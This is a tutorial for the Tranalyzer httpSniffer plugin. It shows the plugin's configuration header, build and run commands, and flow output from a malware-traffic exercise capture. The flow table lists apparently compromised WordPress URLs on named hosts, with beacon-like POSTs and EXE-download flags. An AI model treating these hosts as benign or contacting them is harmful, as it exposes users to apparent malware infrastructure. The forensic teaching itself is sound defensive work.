HTTP: HyperText Transfer Protocol

data carving HTTP layer 7

Introduction

This tutorial discusses the plugin httpSniffer.

Preparation

First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:

t2build -e -y

Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied

Then compile the core (tranalyzer2) and the following plugins:

t2build tranalyzer2 basicFlow tcpStates httpSniffer txtSink

...
BUILD SUCCESSFUL

If you did not create a separate data and results directory yet, please do it now in another bash window, that facilitates your workflow:

mkdir ~/data ~/results

The sample PCAP used in this tutorial can be downloaded here: 2015-05-08-traffic-analysis-exercise.pcap (Source: malware-traffic-analysis.net).

Please save it in your ~/data folder.

Now you are all set for analyzing HTTP traffic!

httpSniffer

Let’s look at the plugin configuration first:

httpSniffer

vi src/httpSniffer.h

As you can see below, you can enable/disable any HTTP field in the protocol to tailor the flow output to your needs. Note, that some fields can be aggregated in the output to avoid multiple entries, which eat your flow space away.

By default everything is enabled.

Any content can be extracted in a file, e.g picture, videos, text, … by enabling the HTTP_SAVE_ constants. As this function is can produce extensive amount of files from large pcaps, it is advisable to run the plugin first without the extract function.

All paths can be changed and reside by default in the /tmp directory.

...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */

#define HTTP_MIME      1 // 1: print mime type in flow file; 0: print # of mime types only
#define HTTP_STAT      1 // 1: print response status code in flow file; 0: print # of status codes only
#define HTTP_MCNT      1 // 1: method counts: GET, POST
#define HTTP_HOST      1 // 1: print hosts in flow file; 0: print # of hosts only
#define HTTP_URL       1 // 1: print URL in flow file; 0: print # of URL only
#define HTTP_COOKIE    1 // 1: print cookies in flow file; 0: print # of cookies only
#define HTTP_IMAGE     1 // 1: print image name in flow file; 0: print # of images only
#define HTTP_VIDEO     1 // 1: print video name in flow file; 0: print # of videos only
#define HTTP_AUDIO     1 // 1: print audio name in flow file; 0: print # of audios only
#define HTTP_MSG       1 // 1: print message name in flow file; 0: print # of messages only
#define HTTP_APPL      1 // 1: print application name in flow file; 0: print # of applications only
#define HTTP_TEXT      1 // 1: print text name in flow file; 0: print # of texts only
#define HTTP_PUNK      1 // 1: print POST/unknown and all else name in flow file; 0: print # of POST/unknown/else only
#define HTTP_BODY      1 // 1: content body exam, print anomaly bits in flow file; 0: none
#define HTTP_BDURL     1 // 1: print body url name in flow file; 0: none
#define HTTP_USRAG     1 // 1: print User-Agents in flow file; 0: none
#define HTTP_XFRWD     1 // 1: print X-Forward-For in flow file; 0: none
#define HTTP_REFRR     1 // 1: print Referer in flow file; 0: none
#define HTTP_VIA       1 // 1: print Via in flow file; 0: none
#define HTTP_LOC       1 // 1: print Location in flow file; 0: none
#define HTTP_SERV      1 // 1: print Server in flow file; 0: none
#define HTTP_PWR       1 // 1: print X-Powered-By in flow file; 0: none

#define HTTP_STATAGA   1 // 1: aggregate stat response in flow file; 0: dont
#define HTTP_MIMEAGA   1 // 1: aggregate mime response in flow file; 0: dont
#define HTTP_HOSTAGA   1 // 1: aggregate Host in flow file; 0: dont
#define HTTP_URLAGA    1 // 1: aggregate URL in flow file; 0: dont
#define HTTP_USRAGA    1 // 1: aggregate User-Agents in flow file; 0: dont
#define HTTP_XFRWDA    1 // 1: aggregate X-Forwarded-For in flow file; 0: dont
#define HTTP_REFRRA    1 // 1: aggregate Referer in flow file; 0: dont
#define HTTP_VIAA      1 // 1: aggregate Via in flow file; 0: dont
#define HTTP_LOCA      1 // 1: aggregate Location in flow file; 0: dont
#define HTTP_SERVA     1 // 1: aggregate Server in flow file; 0: dont
#define HTTP_PWRA      1 // 1: aggregate X-Powered-By in flow file; 0: dont

//#define HTTP_ENT  0    // entropy calculation, not implemented yet

// data carving modes
#define HTTP_SAVE_IMAGE   0 // 1: Save images in files under HTTP_IMAGE_PATH; 0: Don't save images
#define HTTP_SAVE_VIDEO   0 // 1: Save videos in files under HTTP_VIDEO_PATH; 0: Don't save videos
#define HTTP_SAVE_AUDIO   0 // 1: Save audios in files under HTTP_TEXT_PATH; 0: Don't save audios
#define HTTP_SAVE_MSG     0 // 1: Save messages in files under HTTP_MSG_PATH; 0: Don't save pdfs
#define HTTP_SAVE_TEXT    0 // 1: Save texts in files under HTTP_TEXT_PATH; 0: Don't save text
#define HTTP_SAVE_APPL    0 // 1: Save applications in files under HTTP_TEXT_PATH; 0: Don't save applications
#define HTTP_SAVE_PUNK    0 // 1: Save PUT/else content in files under HTTP_PUNK_PATH; 0: Don't save PUT content

#define HTTP_DATA_C_MAX  40 // Maximum dimension of storage arrays per flow
#define HTTP_MXFILE_LEN  80 // Maximum storage name length
#define HTTP_MXUA_LEN   400 // User-Agent length
#define HTTP_MXXF_LEN    80 // X-Forwarded-For length
//#define HTTP_MXCK_LEN   150 // maximum cookie

//#define HTTP_MAXPBIN (1 << 8)

/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */

#define HTTP_RMDIR        1 // empty HTTP_*_PATH before starting (require at least one of HTTP_SAVE*=1)

// User defined storage boundary conditions
#define HTTP_PATH       "/tmp"        // Root path for extracted files

#define HTTP_IMAGE_PATH "httpPicture" // Path for pictures
#define HTTP_VIDEO_PATH "httpVideo"   // Path for videos
#define HTTP_AUDIO_PATH "httpAudio"   // Path for audios
#define HTTP_MSG_PATH   "httpMSG"     // Path for messages
#define HTTP_TEXT_PATH  "httpText"    // Path for texts
#define HTTP_APPL_PATH  "httpAppl"    // Path for applications
#define HTTP_PUNK_PATH  "httpPunk"    // Path for POST / else / unknown content

#define HTTP_NONAME     "nudel"       // name of files without name

/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...

now, run t2 on the supplied pcap.

t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results/ -s

================================================================================
Tranalyzer 0.9.1 (Anteater), Cobra. PID: 28406, Prio: 0, SID: 666
================================================================================
[INF] Creating flows for L2, IPv4, IPv6
Active plugins:
    01: basicFlow, 0.9.1
    02: tcpStates, 0.9.1
    03: httpSniffer, 0.9.1
    04: txtSink, 0.9.1
[INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K)
[INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K)
Processing file: /home/user/data/2015-05-08-traffic-analysis-exercise.pcap
Link layer type: Ethernet [EN10MB/1]
Snapshot length: 65535 (65.53 K)
Dump start: 1431031896.723375000 sec (Thu 07 May 2015 20:51:36 GMT)
Dump stop : 1431032021.842982000 sec (Thu 07 May 2015 20:53:41 GMT)
Total dump duration: 125.119607000 sec (2m 5s)
Finished processing. Elapsed time: 0.014296888 sec
Finished unloading flow memory. Time: 0.014935613 sec
Percentage completed: 100.00%
Number of processed packets: 761
Number of processed bytes: 495665 (495.67 K)
Number of raw bytes: 495665 (495.67 K)
Number of pad bytes: 1857 (1.86 K)
Number of pcap bytes: 507865 (507.87 K)
Number of IPv4 packets: 761 [100.00%]
Number of A packets: 305 [40.08%]
Number of B packets: 456 [59.92%]
Number of A bytes: 34638 (34.64 K) [6.99%]
Number of B bytes: 461027 (461.03 K) [93.01%]
<A packet load>: 113.57
<B packet load>: 1011.02
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0x003c
httpSniffer: Aggregated httpAFlags=0x1103
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET  requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
Headers count: min: 3, max: 3, avg: 3.00
Number of TCP packets: 745 [97.90%]
Number of TCP bytes: 493885 (493.88 K) [99.64%]
Number of UDP packets: 16 [2.10%]
Number of UDP bytes: 1780 (1.78 K) [0.36%]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Number of processed      flows: 68
Number of processed IPv4 flows: 68 [100.00%]
Number of processed A    flows: 34 [50.00%]
Number of processed B    flows: 34 [50.00%]
Number of request        flows: 34 [50.00%]
Number of reply          flows: 34 [50.00%]
Total   A/B    flow asymmetry: 0.00
Total req/rply flow asymmetry: 0.00
Number of processed A+B packets/A+B flows: 11.19
Number of processed A   packets/A   flows: 8.97
Number of processed   B packets/  B flows: 13.41
Number of processed total packets/s: 6.08
Number of processed A+B   packets/s: 6.08
Number of processed A     packets/s: 2.44
Number of processed   B   packets/s: 3.64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<Number of processed flows/s>: 0.54
<Bandwidth>: 31574 b/s (31.57 Kb/s)
<Raw bandwidth>: 31692 b/s (31.69 Kb/s)
Max number of flows in memory: 56 [0.02%]
Memory usage: 0.04 GB [0.05%]
Aggregated flowStat=0x0400000000004000
[INF] IPv4 flows

So the aggregated httpStat tells us there is HTTP.

tawk -V httpStat=0x003c -V httpAFlags=0x1103 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045

The httpStat column with value 0x003c is to be interpreted as follows:

   bit | httpStat | Description
   =============================================================================
     2 | 0x0004   | Internal state: pending URL name
     3 | 0x0008   | HTTP flow
     4 | 0x0010   | Internal state: Chunked transfer
     5 | 0x0020   | Internal state: HTTP flow detected


The httpAFlags column with value 0x1103 is to be interpreted as follows:

   bit | httpAFlags | Description
   =============================================================================
     0 | 0x0001     | POST query with parameters
     1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
     8 | 0x0100     | X-Site Scripting protection
    12 | 0x1000     | Possible EXE download


The httpCFlags column with value 0x0010 is to be interpreted as follows:
The httpCFlags column with value 0x0010 is to be interpreted as follows:

   bit | httpCFlags | Description
   =============================================================================
     4 | 0x0010     | Potential HTTP content


The httpHeadMimes column with value 0x0045 is to be interpreted as follows:

   bit | httpHeadMimes | Description
   =============================================================================
     0 | 0x0001        | Application
     2 | 0x0004        | Image
     6 | 0x0040        | Text

img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0

tawk '{ split($httpImg_Vid_Aud_Msg_Txt_App_Unk, A, "_"); if (A[1] || A[5] || A[6]) print }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | tcol

%dir  flowInd  flowStat            timeFirst             timeLast              duration      numHdrDesc  numHdrs  hdrDesc       srcMac             dstMac             ethType  vlanID  srcIP            srcIPCC  srcIPOrg                          srcPort  dstIP            dstIPCC  dstIPOrg                          dstPort  l4Proto  tcpStatesAFlags  httpStat  httpAFlags  httpMethods  httpHeadMimes  httpCFlags  httpGet_Post  httpRSCnt  httpRSCode  httpURL_Via_Loc_Srv_Pwr_UAg_XFr_Ref_Cky_Mim  httpImg_Vid_Aud_Msg_Txt_App_Unk  httpHosts                          httpURL                                                        httpMimes                               httpCookies                                                                    httpImages                                                                                 httpVideos  httpAudios  httpMsgs  httpAppl                                                                httpText                                                                httpPunk  httpBdyURL  httpUsrAg                                                                                                                                                         httpXFor  httpRefrr                                         httpVia  httpLoc  httpServ                                          httpPwr
B     2        0x0400000000004001  1431031897.090353000  1431031897.467080000  0.376727000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49184    6        0x00             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__285a4d4e4e5a4d4d4649584c5d43064b4745_2_B_1_0"                                                                                                                                                                                                                                                                                              "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     7        0x0400000000004001  1431031898.870027000  1431031899.146185000  0.276158000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49188    6        0x00             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_aa25f5fe2875e3d0a244e6969e589cc4_7_B_1_0"                                                                                                                                                                                                                                                                                                   "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     21       0x0400000000004000  1431031903.508284000  1431031905.661649000  2.153365000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49198    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"        "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_A_1_0"                                                                                                      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     21       0x0400000000004001  1431031903.559171000  1431031905.661533000  2.102362000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49198    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_B_1_0"                                                                                                                                                                                                                                                                              "Apache"                                          "PHP/5.3.29"
A     23       0x0400000000004000  1431031905.838183000  1431031908.624824000  2.786641000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49200    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"        "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_A_1_0"                                                                                                      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     23       0x0400000000004001  1431031905.940902000  1431031908.624779000  2.683877000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49200    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_B_1_0"                                                                                                                                                                                                                                                                              "Apache"                                          "PHP/5.3.29"
B     15       0x0400000000004001  1431031902.907008000  1431031903.049134000  0.142126000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           188.165.164.184  fr       "OVH-MNT"                         80       192.168.138.158  07       "Private network"                 49195    6        0x02             0x0078    0x0100      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/plain"                                                                                                                                                                                                                                                                                                                "__15_B_1_0"                                                                                                                                                                                                                                                                                                                                  "DYNAMIC+"                                        
A     27       0x0400000000004000  1431031915.188019000  1431031917.179846000  1.991827000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49204    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"          "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_A_1_0"                                                                                                        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     27       0x0400000000004001  1431031915.292307000  1431031917.179749000  1.887442000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49204    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_B_1_0"                                                                                                                                                                                                                                                                                "Apache"                                          "PHP/5.3.29"
B     6        0x0400000000004001  1431031897.801147000  1431031961.652768000  63.851621000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49186    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__6_B_1_0"                                                                                                                                                                                                                                                                                                                                   "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     32       0x0400000000004001  1431031946.186389000  1431031950.230839000  4.044450000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49208    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          2_0_0_0_0_0_0                                                                                                                      "image/png"                                                                                                            "_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_32_B_1_0";"_img_rb.png_32_B_3_1"                                                                                                                                                                                                                                                                                                                                                                                                                                                          "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     5        0x0400000000004001  1431031897.787957000  1431031898.067694000  0.279737000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49185    6        0x02             0x0068    0x0000      0x00         0x0001         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_0_1_0                                                                                                                      "application/x-shockwave-flash"                                                                                                                                                                                                                     "__5_B_1_0"                                                                                                                                                                                                                                                                                                                                                                                                           "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     8        0x0400000000004001  1431031899.272356000  1431031900.101930000  0.829574000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49189    6        0x02             0x0068    0x1000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__b514ee6f0fe486009a6d83b035a4c0bd_8_B_1_0"                                                                                                                                                                                                                                                                                                  "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     9        0x0400000000004001  1431031901.437910000  1431031901.594209000  0.156299000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49190    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__b2566564b3ba1a38e61c83957a7dbcd5_9_B_1_0"                                                                                                                                                                                                                                                                                                  "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     31       0x0400000000004001  1431031946.186400000  1431031952.217120000  6.030720000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49207    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_2                          2_0_0_0_0_0_0                                                                                                                      "image/png";"image/vnd.microsoft.icon"                                                                                 "_img_flags_es.png_31_B_1_0";"_favicon.ico_31_B_2_1"                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               "nginx/1.2.1"                                     
B     10       0x0400000000004001  1431031901.748731000  1431031901.905523000  0.156792000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49191    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__3a08b0be8322c244f5a1cb9c1057d941_10_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     11       0x0400000000004001  1431031902.059710000  1431031902.440796000  0.381086000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49192    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__d71e0bd86db9587158745a986a4b3606_11_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     12       0x0400000000004001  1431031902.592729000  1431031902.752525000  0.159796000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49193    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__34eaf8bd50d85d8c6baacb45f0a7b22e_12_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     14       0x0400000000004001  1431031902.893639000  1431031903.051071000  0.157432000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49194    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__60dbe33b908e0086292196ef001816bc_14_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     18       0x0400000000004000  1431031903.090317000  1431031903.288476000  0.198159000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49197    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"  "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_A_1_0"                                                                                                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     18       0x0400000000004001  1431031903.132272000  1431031903.288564000  0.156292000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49197    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_B_1_0"                                                                                                                                                                                                                                                                        "Apache"                                          
B     16       0x0400000000004001  1431031903.188176000  1431031903.341751000  0.153575000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49196    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__51424ddd486ff06861fceed24e86b329_16_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     22       0x0400000000004000  1431031905.650875000  1431031905.834393000  0.183518000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49199    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"  "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_A_1_0"                                                                                                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     22       0x0400000000004001  1431031905.709435000  1431031905.834454000  0.125019000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49199    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_B_1_0"                                                                                                                                                                                                                                                                        "Apache"                                          
A     24       0x0400000000004000  1431031908.613660000  1431031908.779062000  0.165402000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49201    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"    "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_A_1_0"                                                                                                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     24       0x0400000000004001  1431031908.667116000  1431031908.779106000  0.111990000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49201    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_B_1_0"                                                                                                                                                                                                                                                                          "Apache"                                          
